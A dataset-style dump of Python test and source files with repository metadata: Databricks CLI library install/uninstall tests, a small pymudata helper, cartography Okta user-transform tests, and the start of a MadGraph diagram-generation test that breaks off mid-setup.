| 0.042017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96a31767e6d4518787d97f43eb18f76c138512fe
| 13,208
|
py
|
Python
|
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | 1
|
2020-02-08T16:42:02.000Z
|
2020-02-08T16:42:02.000Z
|
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | null | null | null |
tests/libraries/test_cli.py
|
arulajmani/databricks-cli
|
2740846d8a88605747677d3ee9dd7222ab825bac
|
[
"Apache-2.0"
] | null | null | null |
# Databricks CLI
# Copyright 2017 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"), except
# that the use of services to which certain application programming
# interfaces (each, an "API") connect requires that the user first obtain
# a license for the use of the APIs from Databricks, Inc. ("Databricks"),
# by creating an account at www.databricks.com and agreeing to either (a)
# the Community Edition Terms of Service, (b) the Databricks Terms of
# Service, or (c) another written agreement between Licensee and Databricks
# for the use of the APIs.
#
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=redefined-outer-name
import itertools
import mock
import pytest
from click.testing import CliRunner
import databricks_cli.libraries.cli as cli
from databricks_cli.utils import pretty_format
from tests.utils import provide_conf, assert_cli_output
# Cluster id shared by every test in this module.
TEST_CLUSTER_ID = '0213-212348-veeps379'
# Canned payload mirroring the shape returned by the "all cluster statuses"
# API call: one cluster with a single installed jar library.
ALL_CLUSTER_STATUSES_RETURN = {
    'statuses': [{
        'library_statuses': [{
            'status': 'INSTALLED',
            'is_library_for_all_clusters': False,
            'library': {
                'jar': 'dbfs:/test.jar'
            }
        }],
        'cluster_id': TEST_CLUSTER_ID
    }]
}
@pytest.fixture()
def libraries_api_mock():
    """Patch LibrariesApi inside the CLI module and yield the mock instance
    the CLI will receive, so tests can assert on its method calls."""
    with mock.patch('databricks_cli.libraries.cli.LibrariesApi') as api_cls:
        api_instance = mock.MagicMock()
        api_cls.return_value = api_instance
        yield api_instance
@provide_conf
def test_all_cluster_statuses_cli(libraries_api_mock):
    """all-cluster-statuses pretty-prints the API response verbatim."""
    libraries_api_mock.all_cluster_statuses.return_value = ALL_CLUSTER_STATUSES_RETURN
    result = CliRunner().invoke(cli.all_cluster_statuses_cli)
    libraries_api_mock.all_cluster_statuses.assert_called_once()
    assert_cli_output(result.output, pretty_format(ALL_CLUSTER_STATUSES_RETURN))
@provide_conf
def test_list_cli_without_cluster_id(libraries_api_mock):
    """With no --cluster-id, `list` falls back to all-cluster statuses."""
    libraries_api_mock.all_cluster_statuses.return_value = ALL_CLUSTER_STATUSES_RETURN
    result = CliRunner().invoke(cli.list_cli)
    libraries_api_mock.all_cluster_statuses.assert_called_once()
    assert_cli_output(result.output, pretty_format(ALL_CLUSTER_STATUSES_RETURN))
# Canned payload for the single-cluster status call: same installed jar as
# ALL_CLUSTER_STATUSES_RETURN but without the outer 'statuses' wrapper.
CLUSTER_STATUS_RETURN = {
    'library_statuses': [{
        'status': 'INSTALLED',
        'is_library_for_all_clusters': False,
        'library': {
            'jar': 'dbfs:/test.jar',
        }
    }],
    'cluster_id': '0213-212348-veeps379'
}
@provide_conf
def test_cluster_status_cli(libraries_api_mock):
    """cluster-status passes the cluster id through and prints the response."""
    libraries_api_mock.cluster_status.return_value = CLUSTER_STATUS_RETURN
    result = CliRunner().invoke(cli.cluster_status_cli,
                                ['--cluster-id', TEST_CLUSTER_ID])
    libraries_api_mock.cluster_status.assert_called_with(TEST_CLUSTER_ID)
    assert_cli_output(result.output, pretty_format(CLUSTER_STATUS_RETURN))
@provide_conf
def test_list_cli_with_cluster_id(libraries_api_mock):
    """With --cluster-id, `list` queries that single cluster's status."""
    libraries_api_mock.cluster_status.return_value = CLUSTER_STATUS_RETURN
    result = CliRunner().invoke(cli.list_cli, ['--cluster-id', TEST_CLUSTER_ID])
    libraries_api_mock.cluster_status.assert_called_with(TEST_CLUSTER_ID)
    assert_cli_output(result.output, pretty_format(CLUSTER_STATUS_RETURN))
@provide_conf
def test_install_cli_with_multiple_oneof(libraries_api_mock):
    """Passing any two library options at once must be rejected without
    calling the API, for every pair of install options."""
    for first_opt, second_opt in itertools.combinations(cli.INSTALL_OPTIONS, 2):
        result = CliRunner().invoke(cli.install_cli, [
            '--cluster-id', TEST_CLUSTER_ID,
            '--{}'.format(first_opt), 'test_a',
            '--{}'.format(second_opt), 'test_b'])
        libraries_api_mock.install_libraries.assert_not_called()
        assert 'Only one of {} should be provided'.format(cli.INSTALL_OPTIONS) in result.output
@provide_conf
def test_install_cli_jar(libraries_api_mock):
    """--jar installs a single jar library on the given cluster."""
    jar_path = 'dbfs:/test.jar'
    CliRunner().invoke(cli.install_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--jar', jar_path])
    libraries_api_mock.install_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'jar': jar_path}])
@provide_conf
def test_install_cli_egg(libraries_api_mock):
    """--egg installs a single egg library on the given cluster."""
    egg_path = 'dbfs:/test.egg'
    CliRunner().invoke(cli.install_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--egg', egg_path])
    libraries_api_mock.install_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'egg': egg_path}])
@provide_conf
def test_install_cli_wheel(libraries_api_mock):
    """--whl installs a single wheel library on the given cluster."""
    wheel_path = 'dbfs:/test.whl'
    CliRunner().invoke(cli.install_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--whl', wheel_path])
    libraries_api_mock.install_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'whl': wheel_path}])
@provide_conf
def test_install_cli_maven(libraries_api_mock):
    """Maven install: coordinates alone, then + repo, then + exclusions."""
    coordinates = 'org.jsoup:jsoup:1.7.2'
    repo = 'https://maven.databricks.com'
    exclusions = ['a', 'b']

    def invoke_and_check(extra_args, expected_maven):
        # One CLI invocation, one assertion on the resulting API call.
        CliRunner().invoke(cli.install_cli,
                           ['--cluster-id', TEST_CLUSTER_ID] + extra_args)
        libraries_api_mock.install_libraries.assert_called_with(
            TEST_CLUSTER_ID, [{'maven': expected_maven}])

    # Coordinates
    invoke_and_check(
        ['--maven-coordinates', coordinates],
        {'coordinates': coordinates})
    # Coordinates, Repo
    invoke_and_check(
        ['--maven-coordinates', coordinates,
         '--maven-repo', repo],
        {'coordinates': coordinates, 'repo': repo})
    # Coordinates, Repo, Exclusions
    invoke_and_check(
        ['--maven-coordinates', coordinates,
         '--maven-repo', repo,
         '--maven-exclusion', exclusions[0],
         '--maven-exclusion', exclusions[1]],
        {'coordinates': coordinates, 'repo': repo, 'exclusions': exclusions})
@provide_conf
def test_install_cli_pypi(libraries_api_mock):
    """PyPI install forwards both the package spec and the custom repo."""
    package = 'databricks-cli'
    repo = 'https://pypi.databricks.com'
    CliRunner().invoke(cli.install_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--pypi-package', package,
        '--pypi-repo', repo])
    libraries_api_mock.install_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'pypi': {'package': package, 'repo': repo}}])
@provide_conf
def test_install_cli_cran(libraries_api_mock):
    """CRAN install forwards both the package name and the custom repo."""
    package = 'cran-package'
    repo = 'https://cran.databricks.com'
    CliRunner().invoke(cli.install_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--cran-package', package,
        '--cran-repo', repo])
    libraries_api_mock.install_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'cran': {'package': package, 'repo': repo}}])
@provide_conf
def test_uninstall_cli_with_multiple_oneof(libraries_api_mock):
    """Two library options at once must be rejected without calling the API.

    NOTE(review): the loop iterates cli.INSTALL_OPTIONS while the message
    checks cli.UNINSTALL_OPTIONS — presumably the uninstall set is a superset
    (e.g. adds --all); worth confirming against the CLI module.
    """
    for first_opt, second_opt in itertools.combinations(cli.INSTALL_OPTIONS, 2):
        result = CliRunner().invoke(cli.uninstall_cli, [
            '--cluster-id', TEST_CLUSTER_ID,
            '--{}'.format(first_opt), 'test_a',
            '--{}'.format(second_opt), 'test_b'])
        libraries_api_mock.uninstall_libraries.assert_not_called()
        assert 'Only one of {} should be provided'.format(cli.UNINSTALL_OPTIONS) in result.output
@provide_conf
def test_uninstall_cli_all(libraries_api_mock):
    """--all uninstalls every library reported by the cluster status."""
    jar_path = 'dbfs:/test.jar'
    status_payload = {
        "library_statuses": [
            {
                "status": "INSTALLED",
                "is_library_for_all_clusters": False,
                "library": {
                    "jar": jar_path
                }
            }
        ],
        "cluster_id": TEST_CLUSTER_ID,
    }
    libraries_api_mock.cluster_status.return_value = status_payload
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--all'])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'jar': jar_path}])
@provide_conf
def test_uninstall_cli_all_for_no_libraries(libraries_api_mock):
    """--all on a cluster with no libraries must not call the API at all."""
    libraries_api_mock.cluster_status.return_value = {
        "library_statuses": [
        ],
        "cluster_id": TEST_CLUSTER_ID,
    }
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--all'])
    libraries_api_mock.uninstall_libraries.assert_not_called()
@provide_conf
def test_uninstall_cli_jar(libraries_api_mock):
    """--jar uninstalls a single jar library from the given cluster."""
    jar_path = 'dbfs:/test.jar'
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--jar', jar_path])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'jar': jar_path}])
@provide_conf
def test_uninstall_cli_egg(libraries_api_mock):
    """--egg uninstalls a single egg library from the given cluster."""
    egg_path = 'dbfs:/test.egg'
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--egg', egg_path])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'egg': egg_path}])
@provide_conf
def test_uninstall_cli_whl(libraries_api_mock):
    """--whl uninstalls a single wheel library from the given cluster."""
    wheel_path = 'dbfs:/test.whl'
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--whl', wheel_path])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'whl': wheel_path}])
@provide_conf
def test_uninstall_cli_maven(libraries_api_mock):
    """Maven uninstall: coordinates alone, then + repo, then + exclusions."""
    coordinates = 'org.jsoup:jsoup:1.7.2'
    repo = 'https://maven.databricks.com'
    exclusions = ['a', 'b']

    def invoke_and_check(extra_args, expected_maven):
        # One CLI invocation, one assertion on the resulting API call.
        CliRunner().invoke(cli.uninstall_cli,
                           ['--cluster-id', TEST_CLUSTER_ID] + extra_args)
        libraries_api_mock.uninstall_libraries.assert_called_with(
            TEST_CLUSTER_ID, [{'maven': expected_maven}])

    # Coordinates
    invoke_and_check(
        ['--maven-coordinates', coordinates],
        {'coordinates': coordinates})
    # Coordinates, Repo
    invoke_and_check(
        ['--maven-coordinates', coordinates,
         '--maven-repo', repo],
        {'coordinates': coordinates, 'repo': repo})
    # Coordinates, Repo, Exclusions
    invoke_and_check(
        ['--maven-coordinates', coordinates,
         '--maven-repo', repo,
         '--maven-exclusion', exclusions[0],
         '--maven-exclusion', exclusions[1]],
        {'coordinates': coordinates, 'repo': repo, 'exclusions': exclusions})
@provide_conf
def test_uninstall_cli_pypi(libraries_api_mock):
    """PyPI uninstall forwards both the package spec and the custom repo."""
    package = 'databricks-cli'
    repo = 'https://pypi.databricks.com'
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--pypi-package', package,
        '--pypi-repo', repo])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'pypi': {'package': package, 'repo': repo}}])
@provide_conf
def test_uninstall_cli_cran(libraries_api_mock):
    """CRAN uninstall forwards both the package name and the custom repo."""
    package = 'cran-package'
    repo = 'https://cran.databricks.com'
    CliRunner().invoke(cli.uninstall_cli, [
        '--cluster-id', TEST_CLUSTER_ID,
        '--cran-package', package,
        '--cran-repo', repo])
    libraries_api_mock.uninstall_libraries.assert_called_with(
        TEST_CLUSTER_ID, [{'cran': {'package': package, 'repo': repo}}])
| 34.217617
| 99
| 0.685645
| 1,624
| 13,208
| 5.19335
| 0.105911
| 0.077899
| 0.102442
| 0.059284
| 0.832108
| 0.826773
| 0.802585
| 0.785037
| 0.767963
| 0.765355
| 0
| 0.004357
| 0.200712
| 13,208
| 385
| 100
| 34.306494
| 0.794544
| 0.092898
| 0
| 0.725166
| 0
| 0
| 0.141458
| 0.013727
| 0
| 0
| 0
| 0
| 0.102649
| 1
| 0.069536
| false
| 0
| 0.023179
| 0
| 0.092715
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
737e2d4b6b73982878a4c876ce9847472ba73d8d
| 110
|
py
|
Python
|
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
pymudata/utils.py
|
b3by/pymudata
|
41cc3b144c78da7f50e0942767cd6b19f19fa97b
|
[
"MIT"
] | null | null | null |
from .activity import Activity
def from_file(file_path, **kwargs):
    """Build an :class:`Activity` from *file_path*, forwarding keyword args."""
    activity = Activity(file_path, **kwargs)
    return activity
| 18.333333
| 40
| 0.745455
| 15
| 110
| 5.266667
| 0.533333
| 0.202532
| 0.35443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 110
| 5
| 41
| 22
| 0.840426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
7383611f7721d00913ff4d2a677b289f81483afc
| 5,200
|
py
|
Python
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 2,322
|
2019-03-02T01:07:20.000Z
|
2022-03-31T20:39:12.000Z
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 462
|
2019-03-07T18:38:11.000Z
|
2022-03-31T14:55:20.000Z
|
tests/unit/cartography/intel/okta/test_user.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 246
|
2019-03-03T02:39:23.000Z
|
2022-02-24T09:46:38.000Z
|
from cartography.intel.okta.users import transform_okta_user
from tests.data.okta.users import create_test_user
def test_user_transform_with_all_values():
    """A fully-populated test user maps every field through the transform."""
    user = create_test_user()
    timestamp = '01/01/2019, 00:00:01'
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': timestamp,
        'created': timestamp,
        'status_changed': timestamp,
        'last_login': timestamp,
        'okta_last_updated': timestamp,
        'password_changed': timestamp,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_activated():
    """A user with no activation timestamp transforms to activated=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.activated = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': None,
        'created': ts,
        'status_changed': ts,
        'last_login': ts,
        'okta_last_updated': ts,
        'password_changed': ts,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_status_changed():
    """A user with no statusChanged timestamp transforms to status_changed=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.statusChanged = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': ts,
        'created': ts,
        'status_changed': None,
        'last_login': ts,
        'okta_last_updated': ts,
        'password_changed': ts,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_last_login():
    """A user who never logged in transforms to last_login=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.lastLogin = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': ts,
        'created': ts,
        'status_changed': ts,
        'last_login': None,
        'okta_last_updated': ts,
        'password_changed': ts,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_last_updated():
    """A user with no lastUpdated timestamp transforms to okta_last_updated=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.lastUpdated = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': ts,
        'created': ts,
        'status_changed': ts,
        'last_login': ts,
        'okta_last_updated': None,
        'password_changed': ts,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_password_changed():
    """A user with no passwordChanged timestamp transforms to password_changed=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.passwordChanged = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': ts,
        'created': ts,
        'status_changed': ts,
        'last_login': ts,
        'okta_last_updated': ts,
        'password_changed': None,
        'transition_to_status': user.transitioningToStatus,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
def test_userprofile_transform_with_no_transition_status():
    """A user without a transitioning status transforms to transition_to_status=None."""
    ts = '01/01/2019, 00:00:01'
    user = create_test_user()
    user.transitioningToStatus = None
    transformed = transform_okta_user(user)
    assert transformed == {
        'id': user.id,
        'activated': ts,
        'created': ts,
        'status_changed': ts,
        'last_login': ts,
        'okta_last_updated': ts,
        'password_changed': ts,
        'transition_to_status': None,
        'login': user.profile.login,
        'email': user.profile.email,
        'last_name': user.profile.lastName,
        'first_name': user.profile.firstName,
    }
| 30.588235
| 60
| 0.616538
| 666
| 5,200
| 4.611111
| 0.070571
| 0.048193
| 0.096386
| 0.120482
| 0.902963
| 0.874308
| 0.855422
| 0.855422
| 0.855422
| 0.855422
| 0
| 0.129955
| 0.233462
| 5,200
| 169
| 61
| 30.769231
| 0.640492
| 0
| 0
| 0.791045
| 0
| 0
| 0.309231
| 0
| 0
| 0
| 0
| 0
| 0.052239
| 1
| 0.052239
| false
| 0.067164
| 0.014925
| 0
| 0.067164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7388f6569369d7c2f4b72311b7c39b308316d0f6
| 160,950
|
py
|
Python
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 1
|
2016-07-09T00:05:56.000Z
|
2016-07-09T00:05:56.000Z
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 4
|
2022-03-10T09:13:31.000Z
|
2022-03-30T16:15:01.000Z
|
tests/unit_tests/core/test_diagram_generation.py
|
valassi/mg5amc_test
|
2e04f23353051f64e1604b23105fe3faabd32869
|
[
"NCSA"
] | 1
|
2016-07-09T00:06:15.000Z
|
2016-07-09T00:06:15.000Z
|
################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
"""Unit test library for the various base objects of the core library"""
from __future__ import absolute_import
import copy
import itertools
import logging
import math
import tests.unit_tests as unittest
import madgraph.core.base_objects as base_objects
import madgraph.core.diagram_generation as diagram_generation
import models.import_ufo as import_ufo
from madgraph import MadGraph5Error, InvalidCmd
from six.moves import range
from six.moves import zip
#===============================================================================
# AmplitudeTest
#===============================================================================
class AmplitudeTest(unittest.TestCase):
    """Test class for routine functions of the Amplitude object"""

    mydict = {}
    myamplitude = None

    # Ten identical dummy legs, ten vertices built on them and one
    # hundred dummy diagrams used to populate the amplitude under test.
    myleglist = base_objects.LegList([base_objects.Leg({'id':3,
                                                        'number':5,
                                                        'state':True,
                                                        'from_group':False})] * 10)
    myvertexlist = base_objects.VertexList([base_objects.Vertex({'id':3,
                                                                 'legs':myleglist})] * 10)
    mydiaglist = base_objects.DiagramList([base_objects.Diagram(
        {'vertices':myvertexlist})] * 100)
    myprocess = base_objects.Process()

    def setUp(self):
        """Build the reference dict and an Amplitude from it."""
        self.mydict = {'diagrams':self.mydiaglist, 'process':self.myprocess,
                       'has_mirror_process': False}
        self.myamplitude = diagram_generation.Amplitude(self.mydict)

    def test_setget_amplitude_correct(self):
        "Test correct Amplitude object __init__, get and set"
        myamplitude2 = diagram_generation.Amplitude()
        for prop in self.mydict.keys():
            myamplitude2.set(prop, self.mydict[prop])
        self.assertEqual(self.myamplitude, myamplitude2)
        for prop in self.myamplitude.keys():
            self.assertEqual(self.myamplitude.get(prop), self.mydict[prop])

    def test_setget_amplitude_exceptions(self):
        "Test error raising in Amplitude __init__, get and set"
        wrong_dict = self.mydict
        wrong_dict['wrongparam'] = 'wrongvalue'
        a_number = 0
        # Test init
        self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
                          diagram_generation.Amplitude,
                          wrong_dict)
        self.assertRaises(AssertionError,
                          diagram_generation.Amplitude,
                          a_number)
        # Test get
        self.assertRaises(AssertionError,
                          self.myamplitude.get,
                          a_number)
        self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
                          self.myamplitude.get,
                          'wrongparam')
        # Test set
        self.assertRaises(AssertionError,
                          self.myamplitude.set,
                          a_number, 0)
        self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
                          self.myamplitude.set,
                          'wrongparam', 0)

    def test_values_for_prop(self):
        """Test filters for amplitude properties"""
        test_values = [{'prop':'diagrams',
                        'right_list':[self.mydiaglist],
                        'wrong_list':['a', {}]}
                       ]
        temp_amplitude = self.myamplitude
        for test in test_values:
            for x in test['right_list']:
                # assertTrue replaces the deprecated assert_ alias, which
                # was removed from unittest in Python 3.12.
                self.assertTrue(temp_amplitude.set(test['prop'], x))
            for x in test['wrong_list']:
                self.assertFalse(temp_amplitude.set(test['prop'], x))

    def test_representation(self):
        """Test amplitude object string representation."""
        goal = "{\n"
        goal = goal + " \'process\': %s,\n" % repr(self.myprocess)
        goal = goal + " \'diagrams\': %s,\n" % repr(self.mydiaglist)
        goal = goal + " \'has_mirror_process\': False\n}"
        self.assertEqual(goal, str(self.myamplitude))
#===============================================================================
# DiagramGenerationTest
#===============================================================================
class DiagramGenerationTest(unittest.TestCase):
"""Test class for all functions related to the diagram generation"""
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
mymodel = base_objects.Model()
myprocess = base_objects.Process()
ref_dict_to0 = {}
ref_dict_to1 = {}
myamplitude = diagram_generation.Amplitude()
    def setUp(self):
        """Build the toy QCD+QED model (g, u, d, a, e) used by every test.

        Populates the class-level particle and interaction lists, wires them
        into ``self.mymodel``, and regenerates the leg-combination
        reference dictionaries from the interactions.
        """
        # A gluon
        self.mypartlist.append(base_objects.Particle({'name':'g',
                      'antiname':'g',
                      'spin':3,
                      'color':8,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'g',
                      'antitexname':'g',
                      'line':'curly',
                      'charge':0.,
                      'pdg_code':21,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))
        # A quark U and its antiparticle
        # NOTE(review): '\bar u' contains the '\b' (backspace) escape; a raw
        # string r'\bar u' was probably intended — confirm before changing,
        # since other tests may compare this exact value.
        self.mypartlist.append(base_objects.Particle({'name':'u',
                      'antiname':'u~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'u',
                      'antitexname':'\bar u',
                      'line':'straight',
                      'charge':2. / 3.,
                      'pdg_code':2,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antiu = copy.copy(self.mypartlist[1])
        antiu.set('is_part', False)
        # A quark D and its antiparticle
        self.mypartlist.append(base_objects.Particle({'name':'d',
                      'antiname':'d~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'d',
                      'antitexname':'\bar d',
                      'line':'straight',
                      'charge':-1. / 3.,
                      'pdg_code':1,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antid = copy.copy(self.mypartlist[2])
        antid.set('is_part', False)
        # A photon
        # NOTE(review): '\gamma' relies on '\g' not being a recognized escape;
        # a raw string would be safer (invalid-escape warning on new Pythons).
        self.mypartlist.append(base_objects.Particle({'name':'a',
                      'antiname':'a',
                      'spin':3,
                      'color':1,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'\gamma',
                      'antitexname':'\gamma',
                      'line':'wavy',
                      'charge':0.,
                      'pdg_code':22,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))
        # A electron and positron
        self.mypartlist.append(base_objects.Particle({'name':'e+',
                      'antiname':'e-',
                      'spin':2,
                      'color':1,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'e^+',
                      'antitexname':'e^-',
                      'line':'straight',
                      'charge':-1.,
                      'pdg_code':11,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antie = copy.copy(self.mypartlist[4])
        antie.set('is_part', False)
        # 3 gluon vertex
        self.myinterlist.append(base_objects.Interaction({
                      'id': 1,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[0]] * 3),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G'},
                      'orders':{'QCD':1}}))
        # 4 gluon vertex
        self.myinterlist.append(base_objects.Interaction({
                      'id': 2,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[0]] * 4),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'G^2'},
                      'orders':{'QCD':2}}))
        # Gluon and photon couplings to quarks
        self.myinterlist.append(base_objects.Interaction({
                      'id': 3,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[1], \
                                             antiu, \
                                             self.mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))
        self.myinterlist.append(base_objects.Interaction({
                      'id': 4,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[1], \
                                             antiu, \
                                             self.mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))
        self.myinterlist.append(base_objects.Interaction({
                      'id': 5,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[2], \
                                             antid, \
                                             self.mypartlist[0]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQQ'},
                      'orders':{'QCD':1}}))
        self.myinterlist.append(base_objects.Interaction({
                      'id': 6,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[2], \
                                             antid, \
                                             self.mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))
        # Coupling of e to gamma
        self.myinterlist.append(base_objects.Interaction({
                      'id': 7,
                      'particles': base_objects.ParticleList(\
                                            [self.mypartlist[4], \
                                             antie, \
                                             self.mypartlist[3]]),
                      'color': [],
                      'lorentz':['L1'],
